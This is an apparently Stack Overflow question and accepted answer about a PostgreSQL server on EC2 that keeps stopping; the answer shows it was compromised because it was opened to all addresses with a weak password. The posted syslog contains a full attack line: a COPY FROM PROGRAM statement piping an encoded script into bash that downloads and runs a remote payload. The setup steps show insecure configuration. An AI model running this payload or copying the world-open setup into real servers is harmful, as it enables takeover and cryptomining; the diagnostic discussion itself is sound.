# postgresql server on an ec2 instance stop working randomly after around 2 days everytime

Tags: postgresql, amazon-ec2, digital-ocean

I have a postgresql database setup in a ec2 instance (tried on debian, ubuntu and in digital ocean) and for some reason after around 2 days i get the following error when i try to connect myself into it.

```
psql postgres://postgres:postgres@xx.xx.xx/table-name
psql: error: connection to server at "xx.xx.xx", port 5432 failed: Connection refused
    Is the server running on that host and accepting TCP/IP connections?
```

Here is the list of commands that i used

1. Create a ec2 instance
2. ssh into in

```bash
ssh root@XXX.XX.XX.XX
```

3. update and upgrade

```bash
sudo apt-get update && sudo apt-get upgrade
```

3. install postgres

```bash
sudo apt install postgresql postgresql-contrib
```

4. create a new db

```bash
sudo -u postgres createdb mydatabase
```

5. enter into postgres

```bash
sudo -i -u postgres psql
```

6. set the password of the postgres user

```sql
ALTER USER postgres WITH PASSWORD 'xxx';
```

7. allow all ip v4 addresses to connect

```bash
sudo vim /etc/postgresql/[version]/main/pg_hba.conf
```

```
change:
host     all     all     127.0.0.1/32    scram-sha-256
to:
host     all     all     0.0.0.0/0       scram-sha-256
```

8. change postges listenning ip address

```bash
sudo vim /etc/postgresql/[version]/main/postgresql.conf
```

```
change:
#listen_addresses = '127.0.0.1/32'
to:
listen_addresses = '*'
```

9. restart postgres

```bash
sudo service postgresql restart
```

10. check postgres status

```bash
sudo service postgresql status
```

11. connect to it

```bash
psql postgres://postgres:xxx@XXX.XX.XX.XX/mydatabase
```

I tried this exact same config in an ubuntu ec2, a debian ec2 and in a digital ocean droplet. Restarting the postgresql database fixed the problem, but 2 days later the same error above appears back.

Memory detail:

```
admin@xxxx:~$ free
               total        used        free      shared  buff/cache   available
Mem:          997696      269244      195452       13052      704776      728452
Swap:              0           0           0
```

syslog for postgresql:

```
827: crontab: command not found
bash: line 828: crontab: command not found
bash: line 828: crontab: command not found
2023-09-05 10:01:06.381 UTC [36965] postgres@xxx FATAL:  terminating connection due to administrator command
2023-09-05 10:01:06.381 UTC [36965] postgres@xxx CONTEXT:  COPY lhoimykj, line 1: "/tmp/kinsing"
2023-09-05 10:01:06.381 UTC [36965] postgres@xxx STATEMENT:  DROP TABLE IF EXISTS LhoiMYKj;CREATE TABLE LhoiMYKj(cmd_output text);COPY LhoiMYKj FROM PROGRAM 'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDE5NC4zOC4yMS4yNS9wZy5zaHxiYXNoCmVsaWYgWyAteCAiJChjb21tYW5kIC12IHdnZXQpIiBdOyB0aGVuCiAgd2dldCAtcSAtTy0gMTk0LjM4LjIxLjI1L3BnLnNofGJhc2gKZWxzZQogIF9fY3VybCBodHRwOi8vMTk0LjM4LjIxLjI1L3BnMi5zaHxiYXNoCmZp|base64 -d|bash';SELECT * FROM LhoiMYKj;DROP TABLE IF EXISTS LhoiMYKj;
2023-09-05 10:01:06.389 UTC [6462] LOG:  shutting down
2023-09-05 10:01:06.391 UTC [6462] LOG:  checkpoint starting: shutdown immediate
2023-09-05 10:01:06.406 UTC [6462] LOG:  checkpoint complete: wrote 30 buffers (0.2%); 0 WAL file(s) added, 0 removed, 0 recycled; write=0.004 s, sync=0.004 s, total=0.018 s; sync files=24, longest=0.003 s, average=0.001 s; distance=123 kB, estimate=3852 kB
2023-09-05 10:01:06.413 UTC [6461] LOG:  database system is shut down
2023-09-05 15:56:02.498 UTC [39462] LOG:  starting PostgreSQL 15.3 (Debian 15.3-0+deb12u1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit
2023-09-05 15:56:02.499 UTC [39462] LOG:  listening on IPv4 address "0.0.0.0", port 5432
2023-09-05 15:56:02.499 UTC [39462] LOG:  listening on IPv6 address "::", port 5432
2023-09-05 15:56:02.501 UTC [39462] LOG:  listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432"
2023-09-05 15:56:02.518 UTC [39465] LOG:  database system was shut down at 2023-09-05 10:01:06 UTC
2023-09-05 15:56:02.530 UTC [39462] LOG:  database system is ready to accept connections
```

Comment: check the syslog.  I am guessing you are running out of memory.  What is the size of your instance?

Comment: thanks for the help, i have updated my question with more details

Answer (score 1, accepted):

Your server is compromised, likely do to a combination of default / weak passwords and openining postgresql to the world instead of only required IPs or putting it on a private network then allowing `postgres` user from anywhere.

Look at this log entry (actual base64 removed):

```
2023-09-05 10:01:06.381 UTC [36965] postgres@xxx STATEMENT:  DROP TABLE IF EXISTS LhoiMYKj;CREATE TABLE LhoiMYKj(cmd_output text);COPY LhoiMYKj FROM PROGRAM 'echo ... <bunch of base64 encoded stuff> ... |base64 -d|bash';SELECT * FROM LhoiMYKj;DROP TABLE IF EXISTS LhoiMYKj;
```

`COPY ... FROM PROGRAM` is being used to execute arbitrary bash commands.

This is why security is important.  When you do things like:

> ```
> change:
> host     all     all     127.0.0.1/32    scram-sha-256
> to:
> host     all     all     0.0.0.0/0       scram-sha-256
> ```

You're defeating protections that would have saved you from this happening.   It's necessary to keep postgres and nearly all SQL databases from being open to the internet; if nothing else it exposes you to denial of service attacks.  In EC2 doing this with a security group is sufficient.

How do they find your postgres server every few days? (and note, this may or may not be the same party compromising your server every time).  Well, IPv4 address space is pretty small for today's network speeds and so you can enumerate all the interesting IP addresses and port map for things like that pretty easily, probably getting it done in ... a few days.

Needless to say, you should consider the system compromised and start over, from scratch, with a backup of your database (which you might want to carefully review before loading), with appropriate security.

Comment: Quick update after 1 week, everything is still working as expected. Thanks for your answer 